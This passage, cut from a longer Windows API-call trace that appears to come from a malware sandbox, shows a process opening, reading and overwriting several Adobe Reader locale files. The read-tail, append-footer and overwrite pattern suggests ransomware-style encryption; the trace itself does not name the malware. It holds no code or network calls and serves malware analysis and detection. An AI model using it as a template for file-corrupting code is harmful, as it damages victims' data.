lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.868] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.868] WriteFile (in: hFile=0x1e8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0075.868] CloseHandle (hObject=0x1e8) returned 1 [0075.869] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pl_pl\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.869] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.869] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe9 [0075.870] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.870] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.870] ReleaseMutex (hMutex=0x168) returned 1 [0075.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0075.870] ReadFile (in: hFile=0x1e8, lpBuffer=0x26bf2f8, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf2f8*, lpNumberOfBytesRead=0x345f2bc*=0xe9, lpOverlapped=0x0) returned 1 [0075.871] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0075.872] WriteFile (in: hFile=0x1e8, lpBuffer=0x2665888*, nNumberOfBytesToWrite=0x671, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2665888*, lpNumberOfBytesWritten=0x345f2d0*=0x671, lpOverlapped=0x0) returned 1 [0075.872] CloseHandle (hObject=0x1e8) returned 1 [0075.873] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\BRdlang32.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\brdlang32.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.876] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.877] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3600 [0075.877] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.877] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.877] ReleaseMutex (hMutex=0x168) returned 1 [0075.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.PTB", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0075.877] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.PTB", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.PTB", lpUsedDefaultChar=0x0) returned 13 [0075.877] ReadFile (in: hFile=0x1e8, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.883] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2600 [0075.884] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.885] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2600 [0075.886] WriteFile (in: hFile=0x1e8, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.886] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.886] WriteFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0075.886] CloseHandle (hObject=0x1e8) returned 1 [0075.887] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\Multimedia.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\multimedia.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e8 [0075.887] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.887] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x13e00 [0075.888] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0075.888] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0075.888] ReleaseMutex (hMutex=0x168) returned 1 [0075.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.PTB", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0075.888] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.PTB", cchWideChar=14, lpMultiByteStr=0x1f7344c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.PTB", lpUsedDefaultChar=0x0) returned 14 [0075.888] ReadFile (in: hFile=0x1e8, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0075.892] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x12e00 [0075.892] ReadFile (in: hFile=0x1e8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0075.893] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x12e00 [0075.893] WriteFile (in: hFile=0x1e8, lpBuffer=0x2669898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0075.894] SetFilePointer (in: hFile=0x1e8, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0075.894] WriteFile (in: hFile=0x1e8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0075.895] CloseHandle (hObject=0x1e8) returned 1 [0075.895] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\SendMail.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\pt_br\\sendmail.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.348] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.360] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3e00 [0076.360] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.360] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.360] ReleaseMutex (hMutex=0x168) returned 1 [0076.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.PTB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.PTB", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.PTB", lpUsedDefaultChar=0x0) returned 12 [0076.361] ReadFile (in: hFile=0x1d4, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.362] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2e00 [0076.363] ReadFile (in: hFile=0x1d4, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.364] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2e00 [0076.364] WriteFile (in: hFile=0x1d4, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.365] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0076.365] WriteFile (in: hFile=0x1d4, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.365] CloseHandle (hObject=0x1d4) returned 1 [0076.366] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\AdobeCollabSync.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\adobecollabsync.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.367] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.367] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1c00 [0076.367] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.368] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.368] ReleaseMutex (hMutex=0x168) returned 1 [0076.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.RUM", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0076.368] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.RUM", cchWideChar=19, lpMultiByteStr=0x1f88a64, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.RUM", lpUsedDefaultChar=0x0) returned 19 [0076.368] ReadFile (in: hFile=0x1d4, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x345f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0076.370] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0076.370] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x345f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0076.371] CloseHandle (hObject=0x1d4) returned 1 [0076.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\IA32.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\ia32.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.372] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.372] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe00 [0076.372] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.373] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.373] ReleaseMutex (hMutex=0x168) returned 1 [0076.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.RUM", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0076.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.RUM", cchWideChar=8, lpMultiByteStr=0x1f732cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.RUM", lpUsedDefaultChar=0x0) returned 8 [0076.373] ReadFile (in: hFile=0x1d4, lpBuffer=0x2696c18, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x345f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0076.376] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0076.377] WriteFile (in: hFile=0x1d4, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x345f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0076.377] CloseHandle (hObject=0x1d4) returned 1 [0076.377] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ro_RO\\SaveAsRTF.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ro_ro\\saveasrtf.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4a00 [0076.378] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.378] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.378] ReleaseMutex (hMutex=0x168) returned 1 [0076.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.RUM", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.378] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.RUM", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.RUM", lpUsedDefaultChar=0x0) returned 13 [0076.379] ReadFile (in: hFile=0x1d4, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.380] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3a00 [0076.380] ReadFile (in: hFile=0x1d4, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.381] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3a00 [0076.381] WriteFile (in: hFile=0x1d4, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.382] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0076.382] WriteFile (in: hFile=0x1d4, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.382] CloseHandle (hObject=0x1d4) returned 1 [0076.383] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\Accessibility.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\accessibility.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.384] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.385] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xae00 [0076.385] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.385] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.385] ReleaseMutex (hMutex=0x168) returned 1 [0076.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.RUS", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Accessibility.RUS", cchWideChar=17, lpMultiByteStr=0x1f88a64, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Accessibility.RUS", lpUsedDefaultChar=0x0) returned 17 [0076.385] ReadFile (in: hFile=0x1d4, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0076.387] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9e00 [0076.387] ReadFile (in: hFile=0x1d4, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.388] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9e00 [0076.388] WriteFile (in: hFile=0x1d4, lpBuffer=0x2696c18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.389] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0076.389] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0076.389] CloseHandle (hObject=0x1d4) returned 1 [0076.389] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ru_RU\\eBook.RUS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ru_ru\\ebook.rus"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0076.390] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.390] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0076.391] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0076.391] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.406] ReleaseMutex (hMutex=0x168) returned 1 [0076.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.RUS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 